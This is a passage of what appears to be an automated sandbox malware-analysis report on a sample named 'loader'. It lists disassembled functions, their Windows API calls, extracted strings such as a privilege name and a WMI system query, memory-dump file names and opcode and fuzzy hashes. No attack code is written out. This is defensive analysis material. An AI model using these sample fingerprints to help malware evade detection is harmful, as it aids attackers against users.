                                                                                    • SetDlgItemTextW.USER32(?,0066E274,?), ref: 0063E38F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0063E3C9
                                                                                    • GetClientRect.USER32(?,?), ref: 0063E3D5
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E475
                                                                                    • GetWindowRect.USER32(?,?), ref: 0063E4A2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0063E4DB
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0063E4E3
                                                                                    • GetWindow.USER32(?,00000005), ref: 0063E4EE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0063E51B
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0063E58D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ClientItemLongMetricsSystem__vswprintf_c_l_strlen_swprintf
                                                                                    • String ID: $%s:$CAPTION$d
                                                                                    • API String ID: 1562912926-2512411981
                                                                                    • Opcode ID: 3eed607ab324fd27668408b8e752674d086ecb72864452cb66eaabd245274f99
                                                                                    • Instruction ID: 1b8ac89b3d60a926e714cb069f1a57bfe42f5479099213581bffd34f617d4c48
                                                                                    • Opcode Fuzzy Hash: 3eed607ab324fd27668408b8e752674d086ecb72864452cb66eaabd245274f99
                                                                                    • Instruction Fuzzy Hash: 0781A271208311AFD710DFA8CC89A6FBBEAEFC8714F04191DFA84D7291D671E9058B62
                                                                                    Function 0065CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0065CB66
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C71E
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C730
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C742
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C754
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C766
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C778
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C78A
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C79C
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7AE
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7C0
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7D2
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7E4
                                                                                      • Part of subcall function 0065C701: _free.LIBCMT ref: 0065C7F6
                                                                                    • _free.LIBCMT ref: 0065CB5B
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065CB7D
                                                                                    • _free.LIBCMT ref: 0065CB92
                                                                                    • _free.LIBCMT ref: 0065CB9D
                                                                                    • _free.LIBCMT ref: 0065CBBF
                                                                                    • _free.LIBCMT ref: 0065CBD2
                                                                                    • _free.LIBCMT ref: 0065CBE0
                                                                                    • _free.LIBCMT ref: 0065CBEB
                                                                                    • _free.LIBCMT ref: 0065CC23
                                                                                    • _free.LIBCMT ref: 0065CC2A
                                                                                    • _free.LIBCMT ref: 0065CC47
                                                                                    • _free.LIBCMT ref: 0065CC5F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap___free_lconv_mon
                                                                                    • String ID: Memory failed
                                                                                    • API String ID: 358854727-1932948013
                                                                                    • Opcode ID: 49065fc636217472ce2998f3c751b1753727eaf9934a47ff19a5d3173ccf77dd
                                                                                    • Instruction ID: bc69c09b1dfdbcbf1a245411d860f425b89e23b6bbd1c59c1c0ad5a64050562c
                                                                                    • Opcode Fuzzy Hash: 49065fc636217472ce2998f3c751b1753727eaf9934a47ff19a5d3173ccf77dd
                                                                                    • Instruction Fuzzy Hash: CE3162316003099FEB60AA38D846B9A77FBEF50322F10551DE958E7692DF35EC48CB14
                                                                                    Function 0065C8A4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 65COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0065C868: _free.LIBCMT ref: 0065C891
                                                                                    • _free.LIBCMT ref: 0065C8F2
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 0065C8FD
                                                                                    • _free.LIBCMT ref: 0065C908
                                                                                    • _free.LIBCMT ref: 0065C95C
                                                                                    • _free.LIBCMT ref: 0065C967
                                                                                    • _free.LIBCMT ref: 0065C972
                                                                                    • _free.LIBCMT ref: 0065C97D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID: $%s:$Memory$SIZE$tectMemory failed$tectMemory failed
                                                                                    • API String ID: 2929853658-882510896
                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction ID: 5fb04634e692543e64b0ce70db9487fe03aafeafd93627a12ab410008695288d
                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                    • Instruction Fuzzy Hash: A0117F71590B08AEE6A0B7B1CC07FCB7BEE9F10B12F400D1CBA9D66093DA64B54D8754
                                                                                    Function 0064D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0064D6C1
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0064D6ED
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0064D709
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0064D720
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0064D734
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0064D75D
                                                                                    • DeleteObject.GDI32(00000000), ref: 0064D764
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0064D76D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 2845197485-1882779555
                                                                                    • Opcode ID: d4bd5767ed16dacb3576fc501d1c29b3ab7a3beaae0dc89e761565d177402ab7
                                                                                    • Instruction ID: ba5ef39c6a02c1c28bd544b0b115b0ecdfe464ccd6ffc047297f8c58bc2c068b
                                                                                    • Opcode Fuzzy Hash: d4bd5767ed16dacb3576fc501d1c29b3ab7a3beaae0dc89e761565d177402ab7
                                                                                    • Instruction Fuzzy Hash: EA1156329403207BE3206FB09C8AFEF765FAF44711F005126FA01E22A1DB64CF0542B9
                                                                                    Function 006596F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00659705
                                                                                      • Part of subcall function 00658DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0065C896,00663A34,00000000,00663A34,00000000,?,0065C8BD,00663A34,00000007,00663A34,?,0065CCBA,00663A34), ref: 00658DE2
                                                                                    • _free.LIBCMT ref: 00659711
                                                                                    • _free.LIBCMT ref: 0065971C
                                                                                    • _free.LIBCMT ref: 00659727
                                                                                    • _free.LIBCMT ref: 00659732
                                                                                    • _free.LIBCMT ref: 0065973D
                                                                                    • _free.LIBCMT ref: 00659748
                                                                                    • _free.LIBCMT ref: 00659753
                                                                                    • _free.LIBCMT ref: 0065975E
                                                                                    • _free.LIBCMT ref: 0065976C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 2929853658-0
                                                                                    • Opcode ID: f65724a2f51340317286317f281be2c7105f4cad817d6c748c509e71723c7e67
                                                                                    • Instruction ID: 133433b0f8baa970511356ca911361c6afc4bcb3ce5012729dd9edc87ef33eba
                                                                                    • Opcode Fuzzy Hash: f65724a2f51340317286317f281be2c7105f4cad817d6c748c509e71723c7e67
                                                                                    • Instruction Fuzzy Hash: 1E11C37610000DAFCB41EF54C842CD93BB6EF14351F0152A9FE089F662DE32DA589B98
                                                                                    Function 00636FA5 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 329COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00636FAA
                                                                                    • _wcslen.LIBCMT ref: 00637013
                                                                                    • _wcslen.LIBCMT ref: 00637084
                                                                                      • Part of subcall function 0063A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0063977F,?,?,006395CF,00000000,00662641,000000FF), ref: 0063A1F1
                                                                                      • Part of subcall function 00639DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00639E70
                                                                                      • Part of subcall function 00639620: CloseHandle.KERNELBASE(000000FF,?,?,006395D6,00000000,00662641,000000FF), ref: 0063963B
                                                                                      • Part of subcall function 0063A4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,0063A325,00000001,006370E6,?,0063A175,?,00000001,00000000,?,?), ref: 0063A501
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$SE1$UNC\$\??\
                                                                                    • API String ID: 449284102-102587364
                                                                                    • Opcode ID: a770a1208bdfab836e4629326d82e0b912b849c6866967840b2c9333908d6b82
                                                                                    • Instruction ID: a08c8a5cc6d6f0926eb91fd304a3917e42d08dd4f91edf60c615bb83ee0c03d3
                                                                                    • Opcode Fuzzy Hash: a770a1208bdfab836e4629326d82e0b912b849c6866967840b2c9333908d6b82
                                                                                    • Instruction Fuzzy Hash: F4C10BB1D04614AAEB35DB74DC41FEEB7AEAF04300F00455EF956E7282D770AA48CBA5
                                                                                    Function 00652E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 322700389-393685449
                                                                                    • Opcode ID: 361ac871c2516ec28e52cc1e53b5c9d9a0b13bf8a5bef0e9ff7a74222e5e80a2
                                                                                    • Instruction ID: 7e40cafdecf846c2b55159e00fdf82674a675d9f881cf772b3f9a573d5cc6d6d
                                                                                    • Opcode Fuzzy Hash: 361ac871c2516ec28e52cc1e53b5c9d9a0b13bf8a5bef0e9ff7a74222e5e80a2
                                                                                    • Instruction Fuzzy Hash: 3FB19A3180022AEFCF29DFA4C8919AEB7B6BF05752F14455AEC016B312D731DA1ACB95
                                                                                    Function 0064B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00631316: GetDlgItem.USER32(00000000,00003021), ref: 0063135A
                                                                                      • Part of subcall function 00631316: SetWindowTextW.USER32(00000000,006635F4), ref: 00631370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0064B610
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0064B637
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0064B650
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0064B661
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0064B66A
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0064B67E
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0064B694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 3214253823-2177901306
                                                                                    • Opcode ID: 3638b543baefe825f0cfea7ddcc59f83269223cec765c03e14e5715a2fc4bb6b
                                                                                    • Instruction ID: 76811e2733106a7cf7c678bb76ae18dbf42e7327310b301606ba33e72a87cb9e
                                                                                    • Opcode Fuzzy Hash: 3638b543baefe825f0cfea7ddcc59f83269223cec765c03e14e5715a2fc4bb6b
                                                                                    • Instruction Fuzzy Hash: 1521F732240225BBD7119F66EC4AF7B3B7FEB46B85F022019F604D66A0CB52DE019735
                                                                                    Function 0063AF24 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 210COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nd
                                                                                    • API String ID: 3519838083-3110793395
                                                                                    • Opcode ID: f8fe175e92c2791862f1af1575f2f10a0dd840b6095c3e4b5a529abc77210e6a
                                                                                    • Instruction ID: 9db3a2533b389d31ac683e8c24b6bf4d483c2309927635b321928ce99328cc44
                                                                                    • Opcode Fuzzy Hash: f8fe175e92c2791862f1af1575f2f10a0dd840b6095c3e4b5a529abc77210e6a
                                                                                    • Instruction Fuzzy Hash: D7714E71A00629AFDB14DFA4CC959AFB7BAFF48710F14015DE516A73A0CB70AE42DB90
                                                                                    Function 00649711 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00649736
                                                                                    • _wcslen.LIBCMT ref: 006497D6
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0064982D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CreateGlobalStream
                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 1938992887-4209811716
                                                                                    • Opcode ID: a8e72c82e617bdaea83afc7580cfe9a49c098682fdacccc18689ca9e244f14c4
